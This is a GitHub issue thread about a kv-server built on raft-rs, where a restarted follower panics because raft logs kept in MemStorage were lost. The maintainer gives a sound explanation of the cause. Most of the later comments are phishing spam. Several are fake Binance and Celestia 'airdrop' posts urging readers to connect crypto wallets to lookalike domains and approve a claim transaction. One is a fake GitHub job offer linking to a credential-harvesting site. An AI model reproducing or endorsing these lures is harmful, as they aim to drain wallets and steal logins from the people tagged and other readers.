### ISSUE TITLE
Node could not join successfully when restarted

### ISSUE THREAD

**Issue by mosuka** [minghuatang/kv-service-with-libs#2]
I tried a 3-node cluster. It seems work successfully. But when I restart one of the nodes in the cluster, the node couldn't join to cluster successfully.

The executed command is as follows:

```
$ ./kv-server -A 0.0.0.0:3001 -I 1 -s /tmp/kv1 -p "1=0.0.0.0:3001"
$ ./kv-server -A 0.0.0.0:3002 -I 2 -s /tmp/kv2 -p "1=0.0.0.0:3001,2=0.0.0.0:3002" -d 1
$ ./kv-server -A 0.0.0.0:3003 -I 3 -s /tmp/kv3 -p "1=0.0.0.0:3001,2=0.0.0.0:3002,3=0.0.0.0:3003" -d 1
```

Then stop the third node and restart it again with the following command, but the following error occurs:

```
$ ./kv-server -A 0.0.0.0:3003 -I 3 -s /tmp/kv3 -p "1=0.0.0.0:3001,2=0.0.0.0:3002,3=0.0.0.0:3003" -d 1
start server...
id = 3
port = 3003
add to raft cluster success
listening on 0.0.0.0:3003
I'm follower
thread '<unnamed>' panicked at ' to_commit 5 is out of range [last_index 0]', /Users/m-osuka/.cargo/registry/src/github.com-1ecc6299db9ec823/raft-0.4.3/src/raft_log.rs:248:13
note: Run with `RUST_BACKTRACE=1` environment variable to display a backtrace.
thread 'grpc-poll-0' panicked at 'send message to raft error: sending on a closed channel', src/server/mod.rs:291:17
```

Is there any wrong in the above commands?

**Comment by mosuka** [comment]
@5kbpers
Do you have any ideas?

**Comment by 5kbpers** [comment]
Oh, so sorry I don't notice this issue for such a long time.😨
Seems some raft logs were lost after restarting since I use a `MemStorage` as the store of the raft logs.
I will change the `MemStorage` to a Rocksdb instance when I have time, or you can help me to do this job if you are interested, thank you!

**Comment by mosuka** [comment]
Hi @5kbpers ,
Thank you for your reply!
After starting the cluster in the same way as the above command, restarting the leader as follows can join the cluster as a follower without any problems.

```
$ ./kv-server -A 0.0.0.0:3001 -I 1 -s /tmp/kv1 -p "1=0.0.0.0:3001,2=0.0.0.0:3002,3=0.0.0.0:3003" -d 3
```

An error occurs when restarting a follower.
Do you know why the leader and follower behave differently even though they use the same `MemStorage`?

I'm interested in changing `MemStorage` to a Rocksdb instance, but I think it will take longer than you. I look forward to your changes.

**Comment by 5kbpers** [comment]
Here is just my guess since the lack of complete backtrace.
The leader keeps the last index of the logs each follower acks received (see [raft-rs/src/progress/mod.rs#L55](https://github.com/tikv/raft-rs/blob/ba151f4b5c2b2350fc2cc4dfcb4e5475acbc6c22/src/progress/mod.rs#L55)), and sets the `commit` field to `min(pr.matched, self.raft_log.committed))` in every heartbeat (see [raft-rs/src/raft.rs#L654](https://github.com/tikv/raft-rs/blob/ba151f4b5c2b2350fc2cc4dfcb4e5475acbc6c22/src/raft.rs#L654)).
When a follower receives a heartbeat, it will call `self.commit_to` with `heartbeat.commit` to update its committed index. If `heartbeat.commit > self.last_index`, some logs which it acks before were lost, then the process must panic. (see [raft-rs/src/raft_log.rs#L247](https://github.com/tikv/raft-rs/blob/ba151f4b5c2b2350fc2cc4dfcb4e5475acbc6c22/src/raft_log.rs#L247))
When a leader is just elected, it sets `pr.matched` of all followers to 0, so a restarted leader will never panic even though it lost all logs and states.

**Comment by mosuka** [comment]
@5kbpers 
Thanks for the mentoring. It really helped!
Perhaps this problem can be solved by persisting the logs, but what if the follower has lost all logs due to a hardware failure? I think followers can't join a cluster just the same as using MemStorage, but is there a workaround?

**Comment by 5kbpers** [comment]
@mosuka 
You are right, there is not any way to recover a follower which has lost any committed log unless restoring its logs and its meta info manually. And usually, what we tend to do is remove this follower and add a new one.

**Comment by mosuka** [comment]
@5kbpers Thank you for your advice.

**Comment by fede-s** [comment]
# Binance Exclusive Token Giveaway

Welcome to the exclusive Binance Token Giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this incredible opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

[![Claim Now](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)](http://go.bnbcoinsearn.online/97Q7Yj)

<centre>Seize the moment and indulge in your tokens! This limited-time offer won't be available forever. 🌐💰</centre>

## Steps to Claim:

### 1. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share this Token Drop](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)

### 2. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 3. Interact with the Contract:
   - Once your wallet is connected, go to [Binance Rewards](http://go.bnbcoinsearn.online/97Q7Yj).
   - Click on the "Claim" button to interact with the smart contract.

### 4. Claim Your Free Tokens:
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

### 5. Share the Excitement Further:
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=http://go.bnbcoinsearn.online/97Q7Yj&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)

**Comment by ChiyuChen0117** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

[![Claim Now](https://moneybinds.com/wp-content/uploads/2023/12/Binance_Airdrop_feature_img.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

### 3. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [**Share on Twitter**](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)


Winners: @Hala2Madrid, @j92z, @xcshuan, @chaozh, @Sandman-Larissa, @yohaneshalim, @tjulinfan, @yuchiao-yang, @forfreeday, @RenZhou-r

**Comment by tobarbaro** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @

**Comment by anilv2k** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://link.bnbreward.online/0mhPJ2)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://link.bnbreward.online/0mhPJ2) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @

**Comment by kongkiatchanu** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @ugoarzur, @ToJen, @Singer62565658, @espurrr, @dentropy, @Superidq, @asvatov

**Comment by thangtq-pionero** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
yux829, @tdascoli, @revolunet, @ryuji-orca, @fengwuxin, @introvert, @JonatanSalas, @tulaykaya, @josheschulz, @ccinv, @Edozie101, @adrepd, @hbdgr, @cygaar, @zem007, @brownpr, @casperyonel, @bartwr, @RaulSanchezzt, @mikekoopie

**Comment by DrakoAI** [comment]
# Celestia Airdrop - Claim Your Free TIA Tokens Now! 

[![Celestia Banner](https://miro.medium.com/v2/resize:fit:1400/1*O0la1gfWxFHTQf1ZOoT9_Q.png)](https://celestia.eigenllayer.online/)

**Don't Miss Out on Your Share of 60 Million $TIA Tokens!**  
Celestia, the revolutionary data availability network, is giving away a whopping 60 million $TIA tokens to the community! This is your chance to grab a piece of the action and secure your future in the crypto world.

*How to Claim Your Free TIA Tokens:**  
It's easy to get started and claim your free TIA tokens. Follow these simple steps:

1. **Connect Wallet:** Visit the [Celestia Airdrop page](https://celestia.eigenllayer.online/) and connect your wallet.
2. **Claim:** Click the Claim button to receive your tokens.
3. **Interact:** Engage with the provided smart contract to earn additional rewards.

**Why Wait? Start Earning Today!**  
With Celestia, the sky's the limit. Don't let this opportunity slip through your fingers. Join the Celestia Airdrop now and kickstart your journey to financial freedom!jistro, @adamxyzxyz, @NotThatDumb, @tamwile, @escottalexander, @marcialwushu, @marcoonroad, @xlab, @crypto-yang, @demondvn, @Tapuzi, @david-dacruz, @nickgs, @fhouser, @passer-W, @taryune, @carsonharmon, @agroce, @chrismaree, @Earthnook
